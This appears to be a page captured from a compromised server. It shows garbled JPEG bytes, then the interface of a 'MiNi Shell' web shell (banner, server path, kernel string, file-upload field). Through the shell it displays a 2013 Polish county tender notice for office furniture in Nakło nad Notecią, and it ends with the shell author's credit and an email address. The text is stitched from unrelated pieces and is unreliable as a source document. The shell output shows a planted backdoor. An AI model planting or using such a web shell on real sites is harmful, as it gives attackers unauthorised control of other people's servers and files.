JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130617/113939-N-2013.html

<p class="kh_header"><b>Nakło nad Notecią: Przetarg nieograniczony na dostawę mebli biurowych wraz z wyposażeniem i ich rozmieszczeniem wraz z montażem na miejscu w lokalu wg wskazań Zamawiającego</b><br>
<b>Numer ogłoszenia: 113939 - 2013; data zamieszczenia: 17.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nakielski , ul. Gen. H. Dąbrowskiego 54, 89-100 Nakło nad Notecią, woj. kujawsko-pomorskie, tel. 052 3866628, faks 052 3860771.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nakielski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę mebli biurowych wraz z wyposażeniem i ich rozmieszczeniem wraz z montażem na miejscu w lokalu wg wskazań Zamawiającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Dostawa mebli wraz z wyposażeniem i ich rozmieszczenie wraz z montażem 
na miejscu w lokalu wg wskazań Zamawiającego, do Starostwa Powiatowego w Nakle nad Notecią - Wydziału Geodezji i Gospodarki Nieruchomościami w Nakle nad Notecią, przy ulicy ks. Piotra Skargi 6.

Zamówienie obejmuje: dostarczenie, transport, złożenie i montaż mebli, usunięcie opakowań związanych z dostawą i montażem mebli, ustawienie ich na miejsce docelowe, wypoziomowanie, wstępne konserwacje oraz przystosowanie do ich użytkowania (tj. mycie, czyszczenie).

Wszystkie oferowane i dostarczone elementy meblowe wraz z wyposażeniem muszą spełniać minimalne wymagania bezpieczeństwa i higieny pracy oraz ergonomii zawarte w Rozporządzeniu Ministra Pracy i Polityki Socjalnej z dnia 1 grudnia 1998 roku 
w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r., Nr 148, poz. 973).

UWAGA!
Wykonawca w dniu podpisania umowy przedstawi Zamawiającemu paletę kolorów (próbki) laminatów.

1. Elementy meblowe
Oferowane i dostarczone meble muszą być wykonane z godnie z normami dotyczącymi jakości mebli biurowych. Biurka, dostawki, stół na mapy zgodnie z: PN-EN 527-1:2004, PN-EN 527-2:2004, PN-EN 527-3:2004; szafy, kontenery zgodnie z: PN-EN 14074:2006, PN-EN 14073-2:2006, PN-EN 14073-3:2006
Płyta użyta do produkcji mebli powinna spełniać normę PN EN 14322, emisja formaldehydu odpowiadająca klasie E1.
Badania powinny być potwierdzone certyfikatem wystawionym przez niezależną instytucję uprawnioną do wystawiania takich certyfikatów. Certyfikat zostanie przedstawiony zamawiającemu w dniu podpisania umowy. 
Kolor płyt i okucia dostosowane do mebli istniejących w danych pomieszczeniach.

Ilości półek podane orientacyjnie, ostatecznie do uzgodnienia z Zamawiającym. Wszystkie wymiary mebli są wymiarami orientacyjnymi i wykonawca musi dokonać ich dokładnego zwymiarowania na miejscu realizacji z dostosowaniem wyglądu 
i kolorystyki, zgodnie z meblami istniejącymi w danych pomieszczeniach.

Zestawienie mebli
Biurko o zwiększonych gabarytach - sztuk 2;
Wymiary 160x85. Wysokość 82cm. Blat o grubości 28mm wykonany z płyty obustronnie laminowanej o klasie higieniczności E1, oklejonej obrzeżem ABS o grubości  2 mm 
w kolorze blatu. Z lewej strony szafka dostosowana do jednostki komputerowej 
z przewidzianym mocowaniem przewodów, z prawej strony cztery szuflady zamykane na zamek centralny, prowadnice rolkowe - pełen wysuw. Obrzeże korpusów również okleina ABS dostosowana kolorystycznie do koloru korpusów. Biurko wyposażone 
w półkę do klawiatury komputerowej. Blat biurka wyposażony 
w przelotkę na kable w kolorze szarym lub kolorze blatu, o średnicy od 5-8 cm. Okucia: dostosowane do istniejących w pomieszczeniach wskazanych przez Zamawiającego. Kolorystyka: kolor dostosowany do mebli istniejących 
w pomieszczeniach wskazanych przez Zamawiającego.

Stół na mapy - szt. 1;
Wymiary 170x110. Wysokość 82cm. Blat z obrzeżem ABS 28mm x 2mm, w kolorze blatu, wykonany z płyty obustronnie laminowanej o klasie higieniczności E1. Blat osadzony na stelażu wzmocnionym do którego zamocowano nogi drewniane 
z dwupunktowym osadzeniem o przekroju 4,5x 4,5, z załamanymi krawędziami o profilu R-5mm. Obrzeże, okleina ABS w kolorze stelażu. Kolorystyka: kolor dostosowany 
do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego.

Zestaw szaf z nadstawkami o pow. 12,6 m2  - szt. 1;
Płyta obustronnie laminowana o klasie higieniczności E1.Korpus wzmocniony wraz 
z częścią cokołową - dolną. Pod każdą półką listew usztywniająca 10 cm szer., zamontowana w taki sposób, aby przeciwdziałała uginaniu się półek i wypychaniu tylnej ściany przez dokumenty. Całość dostosowana do mebli istniejących. 
Wymiary orientacyjne, właściwe dostosować do warunków w celu zachowania odkrytych przewodów  wentylacyjnych:
Szafa 80x42 wys. 194 - 4 szt. Wyposażona w 5 szt. półek na segregatory.
Szafa 80x42 wys. 194 - 1 szt. Wyposażona w półki na matrykuły.
Szafa 60x42 wys. 120 - 1 szt. Wyposażona w 4 szt. półek na naczynia kuchenne.
Szafa 40x42 wys. 194 - 1 szt. Wyposażona w 5 szt. półek na segregatory.
Nadstawka 80x42 wys. 76 - 5 szt. Wyposażona w 2 szt. półek na segregatory.
Nadstawka 40x42 wys. 76 - 1 szt. Wyposażona w 2 szt. półek na segregatory.
Górna część szafy jak część łącząca z nadstawkami okleinowana obrzeżem ABS 28 mm x 2 mm. Drzwi i korpusy okleinowane obrzeżem ABS w kolorze płyt. Okucia: wszystkie szafy wyposażone w zamki, uchwyty dostosowane do istniejących 
w pomieszczeniach wskazanych przez Zamawiającego. Kolorystyka: kolor dostosowany do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego. Całość zestawu szaf zmontowana w jedną bryłę za pomocą złącz śrubowych, zapewniając trwałość i stabilność  konstrukcji.

Zestaw szafek na dokumenty o pow. 2,2 m2  - szt. 1;
Płyta obustronnie laminowana o klasie higieniczności E1.Korpus wzmocniony wraz 
z częścią cokołową - dolną. Pod każdą półką listew usztywniająca 10 cm szer., zamontowana w taki sposób, aby przeciwdziałała uginaniu się półek i wypychaniu tylnej ściany przez dokumenty. Blat górny o zwiększonej powierzchni . Tył blatu wysunięty o 5 cm od korpusów i z prawej strony wysunięty o 7 cm od korpusu. Całość dostosowana do mebli istniejących. 
Wymiary: 
Szafka 80x42 wys. 110 - 2 szt. Wyposażona w 4 półki. Wysokość wewnątrz półki dolnej 35 cm, dwie powyższe równomiernie rozstawione.
Szafka 40x42 wys. 110 - 1 szt. Z prawej strony. Wyposażona w 4 półki. Wysokość wewnątrz półki dolnej 35 cm, dwie powyższe równomiernie rozstawione.
Górna część szafek okleinowana obrzeżem ABS 28 mm x 2 mm. Drzwi i korpus okleinowane obrzeżem ABS w kolorze płyt. Okucia: wszystkie szafki wyposażone 
w zamki, uchwyty dostosowane do istniejących w pomieszczeniach wskazanych przez Zamawiającego. Kolorystyka: kolor dostosowany do mebli istniejących 
w pomieszczeniach wskazanych przez Zamawiającego. Całość zmontowana w jedną bryłę za pomocą złącz śrubowych, zapewniając trwałość i stabilność  konstrukcji.

Szafa odzieżowa  - szt. 1;
Płyta obustronnie laminowana o klasie higieniczności E1. Wymiary: 
Szafa 80x60 wys. 210 - 1 szt. Wyposażona w 1 półkę, drążek o średnicy 25mm 
na wieszaki. Górna część szafy okleinowana obrzeżem ABS 28 mm x 2 mm. Drzwi 
i korpus okleinowane obrzeżem ABS w kolorze płyt. Okucia: zamek, uchwyty dostosowane do istniejących w pomieszczeniach wskazanych przez Zamawiającego. Kolorystyka: kolor dostosowany do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego. 

Wieszak - sztuk 1;
Wieszak montowany z elementów: dolna część ze stopkami nadająca całej konstrukcji stabilności, górny element posiada osiem haczyków na ubrania zakończonych osłoną 
z tworzywa. Wieszak z miejscem na parasole. Kolor - dostosowany do kolorystyki mebli w pomieszczeniu. 

Zestaw szaf z nadstawkami o pow. 7,28 m2 - szt. 1;
Płyta obustronnie laminowana o klasie higieniczności E1. Korpus wzmocniony wraz 
z częścią cokołową - dolną. Pod każdą półką listew usztywniająca 10 cm szer., zamontowana w taki sposób, aby przeciwdziałała uginaniu się półek i wypychaniu tylnej ściany przez dokumenty. Całość dostosowana do mebli istniejących. 
Wymiary orientacyjne, właściwe dostosować do warunków w celu zachowania odkrytych przewodów wentylacyjnych.
Szafa 80x42 wys. 184 - 3 szt. Wyposażona w 5 szt. półek na segregatory.
Szafa 40x42 wys. 184 - 1 szt. Wyposażona w 5 szt. półek na segregatory.
Nadstawka 80x42 wys. 76 - 3 szt. Wyposażona w 2 szt. półek na segregatory.
Nadstawka 40x42 wys. 76 - 1 szt. Wyposażona w 2 szt. półek na segregatory.
Górna część szafy jak część łącząca z nadstawkami okleinowana obrzeżem ABS 28 mm x 2 mm. Drzwi i korpusy okleinowane obrzeżem ABS w kolorze płyt. Okucia: wszystkie szafy wyposażone w zamki, uchwyty dostosowane do istniejących 
w pomieszczeniach wskazanych przez Zamawiającego. Kolorystyka: kolor dostosowany do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego. Całość zestawu szaf zmontowana w jedną bryłę za pomocą złącz śrubowych, zapewniając trwałość i stabilność konstrukcji.

Zestaw szafek na dokumenty o pow. 1,8 m2 - szt. 1;
Płyta obustronnie laminowana o klasie higieniczności E1. Korpus wzmocniony wraz 
z częścią cokołową - dolną. Pod każdą półką listew usztywniająca 10 cm szer., zamontowana w taki sposób, aby przeciwdziałała uginaniu się półek i wypychaniu tylnej ściany przez dokumenty. Całość dostosowana do mebli istniejących. 
Wymiary: 
Szafka 80x42 wys. 150 - 1 szt. Wyposażona w 4 półki. Trzy szt. półek od dołu 
z wysokością między półkami 35 cm.
Szafka 40x42 wys. 150 - 1 szt. Wyposażona w 4 półki. Trzy szt. półek od dołu 
z wysokością między półkami 35 cm.
Górna część szafek okleinowana obrzeżem ABS 28 mm x 2 mm. Drzwi i korpus okleinowane obrzeżem ABS w kolorze płyt. Okucia: wszystkie szafki wyposażone 
w zamki, uchwyty dostosowane do istniejących w pomieszczeniach wskazanych przez Zamawiającego. Kolorystyka: kolor dostosowany do mebli istniejących 
w pomieszczeniach wskazanych przez Zamawiającego. Całość zmontowana w jedną bryłę za pomocą złącz śrubowych, zapewniając trwałość i stabilność  konstrukcji.

Odbojnice ścienne - 2 szt.;
Płyta obustronnie laminowana o klasie higieniczności E1. Wymiary: 110x25 - 1 szt., 130x25 - 1 szt. Odbojnice okleinowane obrzeżem ABS w kolorze płyt. Montaż z min. 4 punktowym uchwyceniem do ściany, na wysokości i w odległościach dostosowanych 
do krzeseł, jakie zostaną wskazane do użytku przez Zamawiającego.  Kolorystyka: kolor dostosowany do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego.

Nadstawki na biurka - 4 szt.;
Płyta obustronnie laminowana o klasie higieniczności E1. Wymiary: 80x25 wys. 15 - 4 szt. Okleinowane obrzeżem ABS w kolorze płyt. Kolorystyka: kolor dostosowany 
do mebli - biurek istniejących, w pomieszczeniach wskazanych przez Zamawiającego. Nadstawki zamontowane na miejscach wskazanych przez użytkujących 
i niepowodujące samoistnego przemieszczania. 

Szafka na dokumenty przy ksero - 1 szt.;
Płyta obustronnie laminowana o klasie higieniczności E1. Wymiary: 45x60 wys. 105. Okleinowane obrzeżem ABS w kolorze płyt. Kolorystyka: kolor dostosowany do mebli - biurek istniejących, w pomieszczeniach wskazanych przez Zamawiającego. Ilość półek 3 szt. Grubość blatu dolnego 4 cm , wys. przestrzeni półki dolnej 25 cm, pozostałych dwóch po 35 cm wysokości między półkami. Na głębokości szafki przegroda dzieląca szafkę na dwie części. W pierwszej części dostęp do półki 
z przodu i lewego boku (zamocowanie półek do dwóch boków w taki sposób, aby umożliwiało to układanie dokumentów o zwiększonym ciężarze. Druga przegroda - tylna z dostępem  bocznym do półek z lewej strony..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu i dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu i dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu i dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu i dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu i dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty - załącznik nr 1 do SIWZ;
2. pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika;
3. specyfikacja techniczna oferowanych mebli, potwierdzająca spełnienie wszystkich parametrów podanych w opisie przedmiotu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku do treści oferty w zakresie:
1)	Zmiany terminu realizacji zamówienia,
2)	ustawowej zmiany stawki podatku VAT,

Warunkiem wprowadzenia zmian w umowie jest pisemne zwrócenie się o wyrażenie zgody jednej ze stron na dokonanie zmiany w umowie z podaniem uzasadnienia faktycznego oraz wyrażenie zgody drugiej strony. Wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności takich zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-nakielski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nakle nad Notecią
ul. Dąbrowskiego 54
89-100 Nakło nad Notecią.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2013 godzina 08:15, miejsce: Starostwo Powiatowe w Nakle nad Notecią
ul. Dąbrowskiego 54
89-100 Nakło nad Notecią
Biuro obsługi klienta (biuro podawcze - pokój nr 4).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com